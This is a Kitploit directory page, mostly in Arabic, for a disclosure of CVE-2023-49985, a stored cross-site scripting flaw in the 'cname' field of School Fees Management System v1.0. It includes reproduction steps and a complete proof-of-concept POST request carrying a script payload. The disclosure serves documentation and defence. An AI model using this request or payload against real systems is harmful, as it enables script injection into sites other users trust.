Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-49985 — نظام إدارة الرسوم الدراسية الإصدار 1.0 - ثغرة Cross-Site Scripting (XSS) في المعامل "cname" في "new_class" | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-49985
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubgeraldoalcantara/cve-2023-49985

CVE-2023-49985

نظام إدارة الرسوم الدراسية الإصدار 1.0 - ثغرة Cross-Site Scripting (XSS) في المعامل "cname" في "new_class"

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-49985

School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "cname" parameter on "new_class"

الوصف: ثغرة برمجة نصية عبر المواقع (XSS) في المكون "new_class" من نظام إدارة رسوم المدارس v1.0 تسمح للمهاجمين بتنفيذ نصوص برمجية أو HTML تعسفية عبر حمولة مصممة يتم حقنها في المعامل cname.

إصدار المنتج المعرض للخطر: School Fees Management System v1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 28/11/2023
تم التأكيد في: 19/12/2023
CVE: CVE-2023-49985
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

لاستغلال الثغرة، يجب على المستخدم الذي لديه الصلاحيات المناسبة الوصول إلى صفحة "/ci_fms/admin/management/class". في هذه الصفحة، يجب على المستخدم إما تعديل فصل موجود أو إضافة فصل جديد. يجب إدراج الحمولة الخبيثة في المعامل "cname" أثناء هذه العملية.

الطلب:

POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close

------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"

<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"

12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--

المكتشف/المكتشفون:
Geraldo Alcântara

تنزيل الأداة